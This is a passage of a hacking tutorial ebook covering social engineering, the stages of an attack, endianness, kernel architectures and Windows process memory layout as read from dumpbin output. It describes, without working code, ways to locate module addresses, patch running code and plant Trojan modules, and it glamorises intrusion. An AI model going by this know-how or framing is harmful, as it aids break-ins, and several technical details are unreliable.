Uses the CurrentUser key to create a writable instance of the RegistryKey class.
- How to: Read Data from the Windows Registry (C++/CLI)
Uses the CurrentUser key to read data from the Windows registry.
- How to: Retrieve Text from the Clipboard (C++/CLI)
Uses the GetDataObject member function to return a pointer to the IDataObject interface, which can then be queried for the format of the data and used to retrieve the actual data.
- How to: Store Text in the Clipboard (C++/CLI)
Uses the Clipboard object defined in the System.Windows.Forms namespace to store a string.
- How to: Retrieve the Windows Version (C++/CLI)
Demonstrates how to retrieve the platform and version information of the current operating system.
- How to: Retrieve Time Elapsed Since Startup (C++/CLI)
Demonstrates how to determine the tick count, or milliseconds that have elapsed since Windows was started. | http://msdn.microsoft.com/en-us/library/ms235431(d=printer,v=vs.90).aspx | CC-MAIN-2014-23 | refinedweb | 2,106 | 60.14 |
When coordinating code between a master page, a child page and several controls, it can be very useful to have a listing of when each event is fired. There are a lot of lists on the web but they are rarely complete, and I have yet to find the code on how the lists were created. In the end, I wrote my own testing framework, which is the topic of this article.
It turns out to be very simple: override methods to make a note of what is happening, then continue. I did this by creating custom classes to replace the standard Page and MasterPage objects, and by writing "wrapper" web controls. If you are familiar with these techniques or are just looking for a reference, feel free to go to the Results sections at the bottom.
Page
MasterPage
This article is targeted towards beginner-ish web programmers who already know the basics of web programming and have a test site where they can experiment. It was written and tested using ASP.NET 2.0, but there's nothing here that should break with any later versions of .NET. I used VB because that is the language I use every day; the code is simple and should translate into C# very easily.
The first thing I did was create the TestChild and TestMaster classes, which will replace the regular Page and MasterPage classes. The advantage to putting the code in separate classes is that we can have several different test pages without having to copy the code. They start off looking like this:
TestChild
TestMaster
Public Class TestChild
Inherits System.Web.UI.Page
End Class
Public Class TestMaster
Inherits System.Web.UI.MasterPage
End Class
Next is to override the methods we want to document. All of these overrides look the same: they write some text into the response stream, then call the same method in the base class. Here is a typical example:
Protected Overrides Sub OnLoad(ByVal e As System.EventArgs)
Response.Write("Child Load<br/>" + vbCrLf)
MyBase.OnLoad(e)
End Sub
The break tag will put the text on its own line when the page is delivered to the browser, and the carriage return/line feed will put a break in the page's source. These just make the text easier to read. The OnLoad override in TestMaster is identical, except that it writes "Master Load".
OnLoad
In TestChild, I overrode these methods:
LoadControlState
LoadViewState
OnDataBinding
OnInit
OnInitComplete
OnLoadComplete
OnPreInit
OnPreLoad
OnPreRender
OnPreRenderComplete
OnSaveStateComplete
Render
RenderChildren
RenderControl
SaveControlState
SaveViewState
Master pages do not have as many interesting methods. Here is what I overrode in TestMaster:
You may have noticed that I did not override the OnUnload method. This is because the Unload event is fired after the page has been rendered; Response no longer exists so an error gets thrown.
OnUnload
Unload
Response
To get information on control events, we need to create custom controls that will report back. I chose to write a button and a grid, because the ordering of Click and DataBinding is usually where I go wrong (I'm not the only one to change a grid's data before the data is reloaded, am I?)
Click
DataBinding
Namespace TestControls
Public Class TestButton
Inherits System.Web.UI.WebControls.Button
Protected Function Response() As HttpResponse
Return HttpContext.Current.Response
End Function
End Class
Public Class TestGrid
Inherits System.Web.UI.WebControls.GridView
Protected Function Response() As HttpResponse
Return HttpContext.Current.Response
End Function
End Class
End Namespace
Web controls do not have a Response method so I added one; this is just to make the code a bit cleaner and easier to maintain.
By putting the controls in a namespace, we can configure the website to attach a prefix for IntelliSense. I'm not sure if this is actually necessary, but it is useful enough that I always do it. In the web.config file, find the <pages> block inside <system.web>, and add this:
web.config
<pages>
<system.web>
<controls>
<add tagPrefix="test" namespace="TestControls"/>
</controls>
As with TestChild and TestMaster, we override the methods we want to document so they write to the response stream and call the underlying method. The only difference is that we use the ID property of the control rather than static text; this way, we can have several controls on a page and know which message belongs to which control.
ID
Protected Overrides Sub OnPreRender(ByVal e As System.EventArgs)
Response.Write(Me.ID + " PreRender<br/>" + vbCrLf)
MyBase.OnPreRender(e)
End Sub
Most of the interesting methods I wanted to document were in both controls:
RenderContents
In TestButton, I also overrode OnClick and OnCommand. In TestGrid, I overrode OnDataBound.
TestButton
OnClick
OnCommand
TestGrid
OnDataBound
For the grid, let's create a very simple XML data file that we can link to.
<?xml version="1.0" encoding="utf-8" ?>
<People>
<Person firstName="Gregory" lastName="Gadow"/>
</People>
Now we are ready to actually create some pages. For this demo, I am using a single master page and a single child page.
<%@ Master Language="VB" Inherits="TestMaster"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"">
<html xmlns="" >
<head runat="server">
<title></title>
</head>
<body>
<form id="form1" runat="server">
<asp:ContentPlaceHolder
</form>
</body>
</html>
<%@ Page Language="VB" Inherits="TestChild"
MasterPageFile="~/Test.master" Title="Untitled Page" %>
<asp:Content
</asp:Content>
The key here is the Inherits attribute in the <%@ Master %> and <%@ Page %> directives. If you are using the single-page code model (which is what I'm doing here), Inherits tells the compiler to use a class other than the standard one as the page's base; you will need to add the tag yourself. If you are using separate code-behind files, the tag is inserted automatically and will point to your code-behind; you do NOT want to change it there. Instead, go to the code-behind file and change it to be based on your custom classes.
Inherits
<%@ Master %>
<%@ Page %>
We are ready for our first test. Open a browser and point it to the child page you just created.
Child PreInit
Master Init
Child Init
Child InitComplete
Child PreLoad
Child Load
Master Load
Child LoadComplete
Child PreRender
Master PreRender
Child PreRenderComplete
Child SaveViewState
Master SaveViewState
Child SaveStateComplete
Child RenderControl
Child Render
Child RenderChildren
Master RenderControl
Master Render
Master RenderChildren
There you are: the events of a master and child page, documented in the order they occurred. If you look at the browser source, you will notice that the text occurs before even the DOCTYPE declaration. This makes sense, because the messages were sent to the response stream before the page was rendered.
DOCTYPE
Now we add some controls to the child page:
<%@ Page Language="VB" Inherits="TestChild" MasterPageFile="~/Test.master"
Title="Untitled Page" %>
<asp:Content
<hr />
<h3>Child page controls</h3>
<div style="margin-bottom:1em;">
<test:TestGrid
<asp:XmlDataSource
</div>
<test:TestButton
</asp:Content>
The horizontal rule is just a visual separator from the text and our controls, and the div tag groups the grid and its data source while providing a bit of spacing. The documentation now shows:
div
Child PreInit
Child_Grid Init
Child_Button Init
Master Init
Child Init
Child InitComplete
Child PreLoad
Child Load
Master Load
Child_Grid Load
Child_Button Load
Child LoadComplete
Child PreRender
Master PreRender
Child_Grid DataBinding
Child_Grid DataBound events for Child_Grid occur before Child_Button because the grid is above the button. If you reverse these controls, you will see that the order of their events also gets reversed.
Child_Grid
Child_Button
There are a few interesting things to note. The grid's DataBinding and DataBound events occur after the master page's PreRender but before the child page's PreRender. The grid saves its control state, but the button does not. And the controls save their view state after the master page does, which saves its view state after the child page.
DataBound
PreRender
Below the line, we see how the controls got rendered. Notice that the grid gets put on the page during RenderChildren while the button is written during Render.
Click on the button to create a postback, and look at the events.
Child PreInit
Child_Grid Init
Child_Button Init
Master Init
Child Init
Child InitComplete
Child_Grid LoadControlState
Child_Grid LoadViewState
Child_Button LoadViewState
Child PreLoad
Child Load
Master Load
Child_Grid Load
Child_Button Load
Child_Button Click
Child_Button Command
Child LoadComplete
Child PreRender
Master PreRender grid does not bind to any data this time; instead, it reloads the data from the control state. Because this is a postback, there is a view state that can be loaded so the controls do just that. After the button gets loaded, its Click event is processed, then its Command event. The controls are rendered just as they were before.
Command
There are many more tests that can be done: put controls on the master page above and below the content placeholder, try nested master pages, track different controls. Please experiment, and if you get any interesting results, please post them as comments. | http://www.codeproject.com/Articles/106781/Documenting-the-Life-Cycle-of-an-ASP-Page?fid=1586043&df=90&mpp=10&sort=Position&spc=None&tid=3626606&PageFlow=FixedWidth | CC-MAIN-2014-41 | refinedweb | 1,495 | 60.95 |
This action might not be possible to undo. Are you sure you want to continue?
A Tribute to our Homeland The Great Himalaya & all Mountains “Himachal Pradesh” “India”
1
The salvation cannot be achieved by just looking at me. Gautam Budh
2
Who wrote this paper?
This paper is the contribution of Vinay Katoch a.k.a. “v” or vinnu by the inspiration of Swami Maharaj Shri Vishnu Dev ji and His Holiness The Dalai Lama. “vinnu” is a hardware & networking engineer & software developer. He also develops the artificial life, i.e. the worms. This paper is a tribute to all those who have carved this holy land with their sweat & blood.. We admire the Tibetan protest for the Holy Country Tibet.
3
LOX The Legion Of Xtremers “vinnu” and Dhiraj Singh Bhandral (a well known creative software developer) are also known as the LOX (The Legion Of Xtremers) or LOXians. LOXians are known for their stateof-the-art hacks. As being recreation hackers, they can develop the solutions for the extremely secure environments. LOX is known for its lively worms. They also provide the security consultancy & penetration testing services. LOXians are the specialists in artificial life and have developed their own technology of a truly learning, replicating and thinking machine. LOX can be contacted @ 0091-9816163963, 0091-9817016777.
Note: This paper is a non-profit, proof-of-concept and free for distribution and copying under legal services, resources and agencies for study purpose along with the author’s information kept intact. The instructors and institutions can use this paper. This paper is intended for the security literacy. Try to replicate it as much as you can. You can also attach your own name in its contributors list by attaching the concepts and topics as much as you can. For further study or publishing or translation of the final copy of this paper into some other languages or correction, feel free, but place a link for authors and their number for direct contacts. Contact author at [email protected].
4
Contributors Name
1) “vinnu” paper.
Concepts
All concepts present in this Social Engineering Step-by-step Hacking Machine Architectures OS Kernel Architectures Memory Architecture Assembly instructions The Realm of Registers The Operators Identification Anti-Disassembling Techniques Inserting False Machine Code Exporting & Executing Code on Stack Encrypting & Decrypting Code on
Stack DLL Injection Attack DLL Injection by CreateRemoteThread Reading Remote Process Memory Developing Exploits The Injection Vector The Denial of Service Attacks Leveraging Privileges to Ring0 Privileges Leveraging by Scheduled Tasks Service The IDS, IPS & Firewall Systems The Data Security and Cryptanalysis Attacks The Reconnaissance The Idle Scanning Tracing the Route Multiple Network Gateways Detection Web Proxy Detection The Termination The Artificial Life
5
Introducing The World of Hacking
We've swept this place. You've got nothing. Nothing but your bloody knives and your fancy karate gimmicks. We have guns. No, you have bullets and the hope that when your guns are empty... ...I’m no longer standing, because if I am... ...you'll all be dead before you've reloaded. That's impossible! Kill him. (…and sound of gunshots prevails the scene…) My turn. Die! Die! Why won't you die?! Why won't you die? Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy. And ideas are bulletproof. V for Vendetta (Hollywood movie)
6
which can be used to attack and only then. So administrators and developers must study this paper carefully. Because that single event can be proven deadliest. intelligence personnel. who are responsible for the ultra advanced security technologies. spies. the dedicated attacker can invent new attacking technologies. security personnel and secret agents. Because. we are talking about the wannabe hackers. As in the words of NSA (National Security Agency-USA). you must be creative in finding out all of such techniques. if you don’t know the attacking tactics. Remember. students. Off course in this paper. then how will you secure the systems from the attacks? Only knowledge is not enough. who are always curious.Who need this paper? The world is full of brave men & women. Why need to study this paper? This paper contains information that can be applied practically to secure or test the security of any kind of machines & therefore any information (although nothing is secure in this world at full extent) and to carry out the state of the art hacks. and live to know more and ready to do something different in their own way. creative. a single failure of security means total failure of security system. you must know how the things work practically. etc. “even the most secure safe of the world is not secure and totally useless if someone forgets to close its doors properly”. 7 . therefore. you can develop a security system effectively.
The Hacks Welcome to the world of Hacking 8 .
our society will be totally unable to secure the country and will be considered as a dull society. Think about it. whenever & nowhere. Moreover you really need not to spend a huge amount of money for it. Nowadays hackers have to be more intelligent & more creative. Imagine if a same person leaving in two different worlds. What they are shown doing was done few years back. Actually people get hacked even in their normal life. A rough picture of hackers is shown in Hollywood movies. The hacking does not just meant about the computers. But actually hackers are more than that. They are responsible for creating and updating the top security systems. because impossible looking jobs are done successfully. a real world in which you are currently leaving and the other. And must have to guess what they are going to tackle in few moments ahead. They are responsible for the modern day technology and they have developed the techniques to cop with future problems. It’s fascinating. intelligence & the time. What normal people cannot think even in their dreams. The Hollywood hackers cannot withstand the modern day detection and prevention systems. So everyone should read this paper with interest.Be a part of Hacker’s Society We should be thankful to army and the hackers for evolving the science of Hacking. but is possible everywhere. What is invested is you brain. the virtual world. Who The Hackers Are? The hackers are just like us. Whatever they do is for humanity. wherever. then. making them heroes of the modern society. The hacking world is much more glamorous than the fashionable modeling world. hackers can do that in reality. if hackers will be absent from our society. Made of same flesh and bones but think differently. And it makes you live in two different worlds. The hackers may have two different characters in both 9 . The hackers possess higher degree of attitude and fortitude.
the virtual world is also full of two sides. Morris. Morris was just doing his bachelors degree at that time. for the sake of defense services. we are not going to call all such attacking guys as bad guys because. they got the name & fame. I bet you they might respect you if you do it and may offer you a good amount for the exhaustive security penetration testing. Also.worlds. isn’t it? Like in real world. It is always better to do all the good stuff with your real names. which may or may not point to their real world character. The examples are. Yes every kind of virtual netizens (the virtual citizens) have a different name and address. where in one side few people are always trying to crackdown the systems and few people are in other side defending the valuable resources from such guys. Well friends. and homes in virtual world and all these things must not point to their real names addresses. which brought more than 75% of Internet down in its earlier infection within few hours. white hat hackers may have their nicknames or real names as their handler. Morris is known for famous morris worm. if precious may give you a lots of money and this business is hundred times better than real criminal activities as the law implementations are not so strong enough for legal prosecution. for investigating the criminal activities or for the sake of study as most of the hackers are not financially sound to emulate the real security systems so they have to try a hand on the real world working systems or for any other reason. Hackers have a different name called HANDLE. These things are the must for the black hats. a different address. The good hacker always informs the victims after a successful break-in. Well friends. Thus several corporations get behind them to own their creativity. Kevin Mitnik etc. The history is proof itself that none of the hackers are imprisoned long for real big-big scams. Kevin Mitnik is known for the impossible state 10 . they may be doing this whole stuff for the sake of their countries welfare. the cracked side may never want itself to be disclosed as a victim and publicized as a breached party for business reasons and for the sake of not losing their clients. Instead. the another strong reason for hacking is the information itself.
Hackers Are Not Bad Guys Hackers can be a male or female and all are not bad guys. There are several Hollywood movies inspired by Mitnick’s hacks. which do not have ultra advanced technologies. Even in the modern wars & terrorism the countries having effective hacking skills and technologies are secure enough than those. the technology dominates everywhere. And these countries are advanced because they know how to protect themselves and their wealth. Even the whole building where the secret system 11 . Remember only hackers are responsible for securing our country from secret information thefts. And no one other than a hacker can provide a better security. just by receiving the emwaves leakage from the victim monitors or data channels. Remember. The time is the best proof that even in world wars. If you are thinking to guard a secret system in deep underground and employing thousands of commandos and the system will be secure then… give up this opinion as soon as possible. bombs. the advanced countries are advanced not just by their wealth. All in all. While Second World War was prevailed by new technology guns. but in technologies also. the First World War was prevailed by the tanks and minimal air strike technologies.of the art hacks. The modern day hackers are equipped with techniques by which they can even view that what the remote systems are showing at their monitors and even without connecting to the victim systems by any means. Otherwise every tenth part of a second a spy or criminal or enemy countries are trying to prey upon our secrets by any means. The hacker does not need physical access to hack down the systems. encryption machines and air power and the war condition were changed by Atomic bombs. The A2 level security is considered the foolproof security and is considered as top security (most secure in this world) and employs the em leakage proof transmission channels and the monitors. They are responsible for checking the security and improving it. That is why the A2 level of security evolved. submarines. But as the media mostly call them a criminal that is why they don’t take media persons as their friends. they can do it remotely from other ends of the planet earth.
They don’t know how the things work and mostly leave their identity & traces and thus get caught. the black hats are truly criminals.e. But remember there is a term mostly used in hacking world i. The other kind i. there must be a fool somewhere who will trespass the foolproof security. hackers know how the things work and how to dominate the technology safely.e. In the similar way the terrorist group is never called an army or police even if they hold the guns and are trained in army fashion.is kept is made em leak proof. But for bad intentions and use their knowledge against the humanity or for criminal activity. Remember they are only criminals and not the hackers. But a criminal is a bad guy. script kiddies are the guys and gals using the software created by others and use it for the purpose of breaking in or for criminal activity without knowing the potential of the software’s use. Media please take a note of it. 12 . But they differ from script kiddies as they know the advantages as well as disadvantages of the technology and can dominate the technology by inventing their own ways as the hackers do. They are: 1) Script Kiddies 2) Black Hats Well. There are two kinds of guys mostly termed as hackers by most of people. These people are termed as hackers by media and other people that are not true. A criminal is a criminal & not a hacker at all. They don’t know how to carry out the hacks manually.
instead. the people suspecting their own way of working can’t be sure about realizing their own vision & thinking or rather say the dreams. an optimism of very high state. But the answer to those poor people. This is because.The Mindset of a Hacker The only people having high level of positive attitude can become hackers. hacker’s mindset is totally different from the normal people. most people call them over confident. They can’t even think about walking on those virtual paths. because they haven’t achieved those very levels of vision and thinking. All great discoverers & inventors were over confident and were strict to their vision and achieved success. Better say. We are asking those people then. therefore. attitude beyond limits. the over confident people are able to invent or discover their own ways of doing the things. the over confident itself means. Actually. their limit of thinking is beyond explanation. People term them over confident. on which the over confident people are walking. 13 . In real world. All in all. what is the level of confidence? Actually people found them talking & thinking what they can’t think even in far beyond times. it is the passport to the limitless world of hacking. this term should not be taken as negative compliment.
14 . Actually a social engineer is a person with highly sophisticated knowledge of working and responses of human brain. They are always near us in the time of need as fast friends (but not all fast friends are social engineers) and sympathetically hold our emotions and thus get our faith. He bears a great amount of attitude and the confidence. under which attacks related to human brain factor are studied. A social engineer may join the victim corporation as an employee or may become boyfriend of the administrator. In security industry it is a well-known fact that it is extremely difficult to stop a social engineer from achieving his goals. He has the great ability to modify himself according to the environment and to respond quickly against any kind of challenges thrown to him. The attacker is called a social engineer.Social Engineering A special branch of science of hacking is Social Engineering. Remember the truth that a social engineer can even make a corporation vulnerable which employs totally flawless software & hardware systems by gaining the privileged access to highly authenticating places within the victim corporations.
gear and the techniques. They follow the steps to carry out the hacks. html. visual basic. before being too late. But note it down. Before trying to hack the systems. We must have to do something. So that we can land on the war field equipped with the essential equipments. These steps are related to each other one after the other. Remember that we cannot sit by side of the system and see the attack as a movie. and the way different kinds of machine architectures work and their way of storing data and the encryption and decryption systems and how to take advantages of leakages in encryption systems. we must know how the attackers attack. just keep on reading. JavaScript. Even if you don’t have. c. c++. We think you have a Windows (2000. perl. We must know how to exploit the vulnerabilities successfully. 2003. assembly. this paper cares for those who are just stepping into this field of science. we are going to discus the hacks and the exploits first. sometimes the exploits may not do what the 15 . Sometimes the attack is considered as a best defense. Remember it is a big mind game. we cannot stop down the servers or disconnect the systems as in this way the attacker will be considered as a winner who stopped the services of the server from rest of the world. java. XP) or Linux system on x86 architecture. python. we must know the advantages and disadvantages of the technologies used in the system & of your own techniques also. Because to defend effectively. These steps are: 1) Setting a goal and target 2) Reconnaissance 3) Attack and exploit 4) Do the stuff 5) Clear the logs 6) Terminate Before carrying out the hacks the hacker must have the knowledge of the several things like languages like. Therefore in this paper. etc.Step-by-step Hacking The hackers are disciplined like army personnel. Note: The technique used in this paper makes you think like an attacker and not the defender. Well don’t panic friends. Step by step you will have to follow the paper in order to be a hacker.
“v” 16 .defenders can do in panic. we must know what computers understand. The Fundamentals of Hacking To understand the computers.
byte But in Little Endian system: 0x0012FF00 0x0012FF01 0x0012ff02 0x0012FF03 0xE2. This special kind of attack will be discussed in forthcoming discussions. These are: 1) 2) Big Endian Little Endian These architectures differ in a way they store data.Machine Architectures This world is dominated by two kinds of processor architectures (there may be a lot but we need to study only two). lower memory address most sig. While in big Endian no such operations are needed as it stores data as such in the same order (because the data is standardized into the Big Endian way). 17 . thus worthy cpu cycles are wasted in doing so. higher memory address least sig. The big Endian stores data in such a way that most significant byte (a single character is one byte) is stored at lower address. pop it out from the location and then again reverse the order of bytes. higher memory address most sig. Actually for little Endian system the System has to change data in reverse order then store it and while reading. while in little Endian architecture the least significant byte is stored at lower address. Let’s take an example imagine a pointer (an address of a memory location) 0x77E1A4E2 is being stored at memory location starting at 0x0012FF00 then in Big Endian system: 0x0012FF00 0x0012FF01 0x0012ff02 0x0012FF03 0x77. The big Endian are faster than little Endian. byte 0xE1 0xA4 0xE2. Also due to this special way of handling of data the Little Endian systems are more prone to the Off-By-One attacks than big Endian. byte The working of these architectures is vastly affected by their way of storing data. The Intel x86 architecture is Little Endian & Sun SPARC processors are Big Endian. lower memory address least sig. byte 0xA4 0xE1 0x77.
like MSDOS employed the Interrupts & Interrupt tables while Windows employed the message for signaling & transmission of information and controls within its modules. task scheduling and CPU time scheduling. The kernel can be considered as the heart of OS. But we are going to discus only two main architectures of the operating system kernels. There are two main architectures of the kernels employed in most of the operating systems. which overpowers the whole country. speed & security can be main issues. Both kernel architectures have some merits & demerits. The kernel of an operating system can be considered as the parliament house. Every logical module of it works in a single privileged environment and work like a single process. 18 . Monolithic Kernel architecture: The monolithic kernel acts as a single module. it depends upon the architecture of kernel. It is the core of OS. The kernel is responsible for most of troublesome tasks like memory management.OS Kernel Architectures There are several operating systems of different kernel architectures. then the second for other kind of environment. file handling. like a normal workstation needs the speed and the stability is not main issue. I/O handling. But. device drivers etc. while in some conditions the stability may be main issue and in other places reliability. The different OS are employed in different environments. we are interested in the architecture of kernel. OS can be differentiated by their way of signaling. These are monolithic & microkernel architecture based kernels. which constitute most of the operating systems. in the same way every single event is controlled by the kernel in OS. The one is suitable for some special kinds of environments.
Micro Kernel Architecture OS 19 .Monolithic Kernel Architecture OS Microkernel architecture: The microkernel acts as a collection of several logical modules executing independent of one another with different privilege levels.
But security is a big issue today. most of the operating system components work in user space and are unprotected.The major difference lies in the privileges of different constituting system managers of the kernel. specially provided by the hardware components and thus. thus. In monolithic kernel every logical part works in kernel mode in ring0 while in microkernel. when it is in queue with other user mode code. in monolithic kernel. it can safely be shutdown without affecting other kernel modules and system managers. then. failure of a single system manager or component module will lead to the crash. thus the operating system has the flexibility to be modified as par user’s requirements. It introduces somewhat stability in microkernel based OS. as all of the system managers’ work in kernel mode in monolithic kernel architecture. Performance is also a big factor. For examples in Linux. While in Windows OS. On the other hand. Other thing that boosts up the Windows OS is the algorithm logic used in CPU time scheduler. As if any error occurs in any module like in file manager or memory manager. It gives priority to kernel mode code in time sliced execution. This leads to maintainability and stability of the OS and makes the OS ideal for server environments. Thus a performance boost is a main feature in monolithic kernels. in microkernel architecture. only few modules work in kernel mode while most of important system managers work in the user space. the hardware acceleration plays a vital role in boosting its performance and speed. as the errors are not going to affect other users. but is relatively slower than Windows OS as its most of the code run in user mode and gets less flexibility as provided for kernel mode code by hardware acceleration. they have access to most of the facilities. most of the operating system components execute in user space and not in kernel mode. 20 . an attacker can unplug any system component and can plug an altered Trojan module in its place to hide his activities and control the operating system to perform as desired.
21 .
Every section has attributes associated with it. its understanding will help in carrying out most of the attacks.text” section by default.rdata section And may be other sections. execute. 2003.e. This can be achieved with a special function writeProcessMemory found in kernel32. any hacker can modify the code while executing the program and thus make the program to do what he wants or may crash it.” as “. Otherwise. It means that the code section (. therefore. That is why this section has the attributes ‘execute’ and ‘read’ associated with it. This section cannot be modified. XP. The section name starts with a “. 2000. so ‘write’ attribute is not associated with it.text) cannot be modified once the program is executing.text or code section . The process memory is segmented in recent Operating Systems i. And the memory manager is responsible for further allocation and freeing the blocks inside the allocated memory for the process. A special case is there in which we can modify the machine instructions on the fly (while process is in execution). but attached as a convention.dll module is loaded in every process’s memory space at a fixed 22 .data section . The different memory sections in Windows systems are: 1) 2) 3) 4) . write. Well the executable code lies in the “. Linux etc.text section is not fully true.dll. If anyone tries to change the contents of code section this will lead to an exception and thus operating system immediately stops the execution of the program. These attributes are read.Memory Architecture In this section we are going to discus the structure of the process memory space. But this myth about read only . The kernel32.text”. depending upon the program. every program is composed of several different sections (in Windows NT. Note: The dot before section name is not mandatory. while 9x supports a straight forward linear structure). This is the most critical section to be understood and we must have to visualize it in our minds. it is not permitted. The memory allocation for every process is the headache of operating system.
“Enter user name: “will go in . The next section is . Fortunately a technique is there to thwart this security. The important thing about it is that at the low-level.rdata section. But not execute for the sake of security. There may be other sections also depending upon the size or type of program. This security system is already employed in few other operating systems. The next section is “. which comes with visual studio sdk. Such as the strings which are not assigned to variables but. function arguments are passed through it mostly. The memory functions like malloc () and new () are used to allocate memory dynamically for objects. e. The Bss section is dynamically created on the fly during execution and can be divided into two parts: 1) Heap 2) Stack Heap: Heap is also called dynamic memory section. they are searched with other technique and thus address is located. The variables and objects. Well leave this discussion here for later study. The . But the windows vista employs ASLR security system (Address Space Layout Randomization).data section.data” section as name suggests this section contains the data required by the executing code. but can be loaded manually at any other location with the help of utility like rebase. are saved into this part of memory. The ASLR is not new to hacker’s community. In which the modules are not found by their offsets hard coded instead. It takes 23 . the modules are loaded at fixed addresses in memory.exe. which are dynamically created.data section has read & write attributes. In which every module is loaded at a random address location every time the process is executed. are printed like in cout or printf functions in c++. The initiated & relocatable variables are saved in this section and has ‘read only’ attribute associated with it. But it really does not mean that the hacker will never find the address of writeProcessMemory or any other needed function. Stack: The stack is also called automatic memory section. Until windows XP.memory location. The next section we are going to discus is Bss.g.
To check out the memory sections we can use dumpbin. Heap grows downwards along with lower memory addresses to higher memory addresses. off-by-one errors. But don’t panic we will discus the ways to break in such security. In this approach the both sections share the same block of memory known as bss section in which heap grows downwards from top to bottom and stack grows upwards from down to top. 24 . While the stack grows upward towards the heap from higher memory addresses to the lower memory addresses. through argument management. buffer overflow attack. The heap and stack are actually two subsections of single memory section and they grow towards each other. Stack controls the function execution. A special security feature called CANARY or COOKIE is implemented on the stack memory to thwart the attempts to overflow the memory. The implementation of stack and heap is very important to understand most worse kinds of attacks e. As is clear from figure This approach to grow towards each other is very valuable to save precious memory.exe utility supplied with most SDKs like visual studio etc. Rest on stack and heap will be discussed in next sections of our discussions. thus approaching each other. etc.g.part in the low-level machine instruction processing.
dll PE signature found File Type: DLL FILE HEADER VALUES 14C machine (i386) 4 number of sections 3844D034 time date stamp Wed Dec 01 01:37:24 1999 0 file pointer to symbol table 0 number of symbols E0 size of optional header 230E characteristics Executable Line numbers stripped Symbols stripped 32 bit word machine Debug information stripped DLL OPTIONAL HEADER VALUES 10B magic # 5. cl. All rights reserved. when setup prompts for the environment registration.exe.exe. link.exe. windiff. Most of operating system’s DLL files are found in system32 folder or in system32\dllCache folder.00 image version 4. etc.8168 Copyright (C) Microsoft Corp 1992-1998. Let us see what the dumpbin shows us about kernel32. rebase.exe. presses OK and you can avail the features of dumpbin.00 operating system version 5. Microsoft (R) COFF Binary File Dumper Version 6. Dump of file kernel32.12 linker version 5D200 size of code 55800 size of initialized data 0 size of uninitialized data C3D8 RVA of entry point 1000 base of code 59000 base of data 77E80000 image base 1000 section alignment 200 file alignment 5.exe.00.00 subsystem version 0 Win32 version B6000 size of image 400 size of headers BF812 checksum 3 subsystem (Windows CUI) 0 DLL characteristics 25 .dll.Note: In order to install it while visual studio installation.
-------misc 110 00000000 B2C00 SECTION HEADER #2 .40000 size of stack reserve 1000 size of stack commit 100000 size of heap reserve 1000 size of heap commit 0 loader flags 10 number of directories 56440 [ 5B54] RVA [size] of Export Directory 5BF94 [ 32] RVA [size] of Import Directory 61000 [ 50538] RVA [size] of Resource Directory 0[ 0] RVA [size] of Exception Directory 0[ 0] RVA [size] of Certificates Directory B2000 [ 359C] RVA [size] of Base Relocation Directory 5E0EA [ 1C] RVA [size] of Debug Directory 0[ 0] RVA [size] of Architecture Directory 0[ 0] RVA [size] of Special Directory 0[ 0] RVA [size] of Thread Storage Directory 60740 [ 40] RVA [size] of Load Configuration Directory 268 [ 1C] RVA [size] of Bound Import Directory 1000 [ 52C] RVA [size] of Import Address Table Directory 0[ 0] RVA [size] of Delay Import Directory 0[ 0] RVA [size] of Reserved Directory 0[ 0] RVA [size] of Reserved Directory SECTION HEADER #1 .data name 1A30 virtual size 5F000 virtual address 1A00 size of raw data 5D600 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers C0000040 flags Initialized Data Image Name: dll\kernel32.text name 5D1AE virtual size 1000 virtual address 5D200 size of raw data 400 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers 60000020 flags Code Execute Read Debug Directories Type Size RVA Pointer -----.-------.-------.dbg 26 .
Read Write SECTION HEADER #3 . Which are: 1000 base of code 77E80000 image base 27 . we’ll discus it later). which will be very helpful in hacking the processes.text The above listing is the output of command: D:\WINNT\system32\>dumpbin /headers kernel32.data 4000 . because segment means a single process memory space. a segment is comprised of several sections. There are few important entries in this excerpt under OPTIONAL HEADER VALUES.reloc name 359C virtual size B2000 virtual address 3600 size of raw data AF600 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers 42000040 flags Initialized Data Discardable Read Only Summary 2000 .rsrc 5E000 .dll As we discussed it earlier that there may be different number of memory sections in each program (please don’t use word segment here. The number of sections is shown in Summary block.reloc 51000 .rsrc name 50538 virtual size 61000 virtual address 50600 size of raw data 5F000 file pointer to raw data 0 file pointer to relocation table 0 file pointer to line numbers 0 number of relocations 0 number of line numbers 40000040 flags Initialized Data Read Only SECTION HEADER #4 .
in Windows XP it will be 7c800000 or whatever). Remember that by default every process in memory starts at 28 . The offsets of all sections can be taken from SECTION HEADER # headers there is a field name virtual address which contains the offset for each section. we will discuss such techniques later under writing shellcode section. well. for . It is really a big security problem. Virtual size of this section is 1A30 and the most required entry virtual address is 5F000.Well. So we have now image base 77E80000 add 1000 into it 77E80000 + 1000 = 77E81000 is the memory address from where code starts in memory. In the same way we can calculate other sections addresses also. Now 1000 base of code tells us that . E.data.dll is loaded (this excerpt is taken from WINDOWS 2000 professional.data section 0x77E80000 + 0x0005F000 = 0x77EDF000 So 0x77EDF000 is the required address. The MZ and PE headers lies between these offsets.dll (which is loaded for every process) and can avail the dreadful features of DLL and can do any thing as he wishes.data name 1A30 virtual size 5F000 virtual address The name of section is . By identifying the OS type any hacker can find out the image base of the important DLLs like kernel32. Let’s calculate the address of .text section or the code lies at an offset of 1000 from image base. To complicate and strengthen the security in most secure environments one must change these DLL’s image base offsets. instead strong but the hackers use most sophisticated approach which can side apart such precautions also. But what lies between image address and x77E81000 (The difference is x1000 = 1600bytes). But don’t think that the security will be foolproof.g.exe can do it or manually with the help of a hexeditor. Rebase. well what’s goin on here dudes? The value 77E80000 is the memory address where for each process the kernel32.data section the entry SECTION HEADER #2 .
